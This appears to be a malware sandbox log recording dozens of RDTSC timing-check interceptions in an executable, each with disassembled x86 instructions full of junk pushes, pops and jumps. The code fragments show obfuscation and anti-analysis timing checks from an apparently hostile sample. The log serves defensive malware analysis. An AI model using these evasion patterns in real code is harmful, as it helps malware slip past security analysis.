Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690AF9 second address: 5690AFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690AFF second address: 5690B28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08ED2385F5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690B28 second address: 5690B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F08ED2F2E99h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690B5C second address: 5690B9B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F08ED2385F0h 0x00000008 adc si, 4928h 0x0000000d jmp 00007F08ED2385EBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F08ED2385F5h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690B9B second address: 5690BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E8Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569065F second address: 5690674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690674 second address: 5690691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690691 second address: 5690695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690695 second address: 5690699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690699 second address: 569069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569069F second address: 56906E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov edx, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, edi 0x00000011 pushfd 0x00000012 jmp 00007F08ED2F2E97h 0x00000017 add esi, 0B953C7Eh 0x0000001d jmp 00007F08ED2F2E99h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690542 second address: 5690548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690548 second address: 5690586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 639B2DC3h 0x00000008 call 00007F08ED2F2E98h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F08ED2F2E97h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690586 second address: 56905DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F08ED2385EEh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F08ED2385F0h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F08ED2385F7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56905DE second address: 56905E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0240 second address: 56A0264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08ED2385ECh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0264 second address: 56A0269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0269 second address: 56A0288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, ax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F08ED2385F0h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0288 second address: 56A0297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0297 second address: 56A02AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0EE6 second address: 56D0EEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0EEC second address: 56D0EF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0EF2 second address: 56D0EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0EF6 second address: 56D0F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F08ED2385F1h 0x00000012 add si, E036h 0x00000017 jmp 00007F08ED2385F1h 0x0000001c popfd 0x0000001d mov ecx, 7A4D4027h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0F31 second address: 56D0F39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B03D4 second address: 56B03E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B03E5 second address: 56B0403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0403 second address: 56B0409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0409 second address: 56B0429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0429 second address: 56B042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B042D second address: 56B0431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0431 second address: 56B0437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0437 second address: 56B043D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B043D second address: 56B0441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0441 second address: 56B04A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F08ED2F2E98h 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 jmp 00007F08ED2F2E90h 0x00000017 and dword ptr [eax], 00000000h 0x0000001a pushad 0x0000001b jmp 00007F08ED2F2E8Eh 0x00000020 jmp 00007F08ED2F2E92h 0x00000025 popad 0x00000026 and dword ptr [eax+04h], 00000000h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov esi, ebx 0x0000002f movsx edi, si 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56903E8 second address: 56903EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56903EC second address: 56903F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56903F2 second address: 569041E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F08ED2385F0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569041E second address: 569042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569042D second address: 5690433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690433 second address: 5690437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5690437 second address: 569043B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 569043B second address: 569047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, 2AA3h 0x0000000e jmp 00007F08ED2F2E98h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F08ED2F2E97h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56A0E1A second address: 56A0ED5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2385F7h 0x00000009 add ecx, 5ADFC81Eh 0x0000000f jmp 00007F08ED2385F9h 0x00000014 popfd 0x00000015 call 00007F08ED2385F0h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push ebp 0x0000001f jmp 00007F08ED2385EEh 0x00000024 mov dword ptr [esp], ebp 0x00000027 jmp 00007F08ED2385F0h 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 movzx ecx, bx 0x00000035 popad 0x00000036 pushfd 0x00000037 jmp 00007F08ED2385EFh 0x0000003c sbb ax, 083Eh 0x00000041 jmp 00007F08ED2385F9h 0x00000046 popfd 0x00000047 popad 0x00000048 pop ebp 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F08ED2385EDh 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0108 second address: 56B0158 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F08ED2F2E95h 0x00000008 xor al, FFFFFFF6h 0x0000000b jmp 00007F08ED2F2E91h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F08ED2F2E8Eh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F08ED2F2E8Eh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B0158 second address: 56B01C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 10357BF4h 0x00000008 mov di, 6360h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F08ED2385F5h 0x00000017 add eax, 0AE02866h 0x0000001d jmp 00007F08ED2385F1h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F08ED2385F0h 0x00000029 sub cl, 00000008h 0x0000002c jmp 00007F08ED2385EBh 0x00000031 popfd 0x00000032 popad 0x00000033 mov ebp, esp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B01C0 second address: 56B01C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B01C4 second address: 56B01CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56B01CA second address: 56B0205 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F08ED2F2E96h 0x0000000b jmp 00007F08ED2F2E95h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pop ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov dl, ch 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D073E second address: 56D0744 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0744 second address: 56D07B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2F2E98h 0x00000009 sbb esi, 5FF91978h 0x0000000f jmp 00007F08ED2F2E8Bh 0x00000014 popfd 0x00000015 movzx esi, bx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ecx 0x0000001e jmp 00007F08ED2F2E8Bh 0x00000023 mov eax, dword ptr [774365FCh] 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushfd 0x0000002c jmp 00007F08ED2F2E92h 0x00000031 sbb cx, C308h 0x00000036 jmp 00007F08ED2F2E8Bh 0x0000003b popfd 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D07B2 second address: 56D07C8 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 6DF9E57Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e test eax, eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D07C8 second address: 56D07CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D07CC second address: 56D07E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D07E5 second address: 56D0829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F08ED2F2E93h 0x00000009 sbb cx, 415Eh 0x0000000e jmp 00007F08ED2F2E99h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F095EFD5FCEh 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0829 second address: 56D0831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, ax 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0831 second address: 56D0845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edi, 69FD6C88h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0845 second address: 56D08CC instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov bh, ch 0x00000009 popad 0x0000000a xor eax, dword ptr [ebp+08h] 0x0000000d jmp 00007F08ED2385F2h 0x00000012 and ecx, 1Fh 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F08ED2385EEh 0x0000001c xor esi, 1D82C218h 0x00000022 jmp 00007F08ED2385EBh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F08ED2385F8h 0x0000002e sbb ch, 00000078h 0x00000031 jmp 00007F08ED2385EBh 0x00000036 popfd 0x00000037 popad 0x00000038 ror eax, cl 0x0000003a pushad 0x0000003b jmp 00007F08ED2385F4h 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D08CC second address: 56D08E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 386Dh 0x00000008 popad 0x00000009 popad 0x0000000a leave 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F08ED2F2E8Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D08E8 second address: 56D0900 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0900 second address: 56D094A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00ED2014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007F08F1B336D1h 0x00000023 push FFFFFFFEh 0x00000025 jmp 00007F08ED2F2E97h 0x0000002a pop eax 0x0000002b pushad 0x0000002c mov esi, 61837F6Bh 0x00000031 movzx esi, dx 0x00000034 popad 0x00000035 ret 0x00000036 nop 0x00000037 push eax 0x00000038 call 00007F08F1B336EFh 0x0000003d mov edi, edi 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F08ED2F2E96h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D094A second address: 56D0971 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08ED2385F5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0971 second address: 56D0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D0977 second address: 56D097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D097B second address: 56D097F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D097F second address: 56D09A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cl, 19h 0x0000000c movsx edi, cx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F08ED2385EFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56D09A1 second address: 56D09C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5680019 second address: 568001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 568001D second address: 5680021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5680021 second address: 5680027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5680027 second address: 568013C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F08ED2F2E96h 0x00000014 sub eax, 6AA9B008h 0x0000001a jmp 00007F08ED2F2E8Bh 0x0000001f popfd 0x00000020 call 00007F08ED2F2E98h 0x00000025 pushad 0x00000026 popad 0x00000027 pop ecx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F08ED2F2E97h 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 call 00007F08ED2F2E94h 0x00000037 mov ebx, eax 0x00000039 pop esi 0x0000003a pushfd 0x0000003b jmp 00007F08ED2F2E97h 0x00000040 add eax, 3E101BBEh 0x00000046 jmp 00007F08ED2F2E99h 0x0000004b popfd 0x0000004c popad 0x0000004d and esp, FFFFFFF8h 0x00000050 pushad 0x00000051 mov cx, dx 0x00000054 popad 0x00000055 push ebp 0x00000056 jmp 00007F08ED2F2E92h 0x0000005b mov dword ptr [esp], ecx 0x0000005e pushad 0x0000005f call 00007F08ED2F2E8Eh 0x00000064 pop edx 0x00000065 jmp 00007F08ED2F2E8Eh 0x0000006a popad 0x0000006b xchg eax, ebx 0x0000006c push eax 0x0000006d push edx 0x0000006e jmp 00007F08ED2F2E97h 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 568013C second address: 5680154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5680154 second address: 56801B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F08ED2F2E8Ch 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 pushfd 0x00000014 jmp 00007F08ED2F2E8Ch 0x00000019 and ax, 3E38h 0x0000001e jmp 00007F08ED2F2E8Bh 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 push eax 0x00000029 mov dh, 7Eh 0x0000002b pop esi 0x0000002c jmp 00007F08ED2F2E8Dh 0x00000031 popad 0x00000032 mov ebx, dword ptr [ebp+10h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F08ED2F2E8Dh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56801B4 second address: 56801C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 1612h 0x00000007 push edx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56801C7 second address: 56801CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56801CB second address: 56801D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
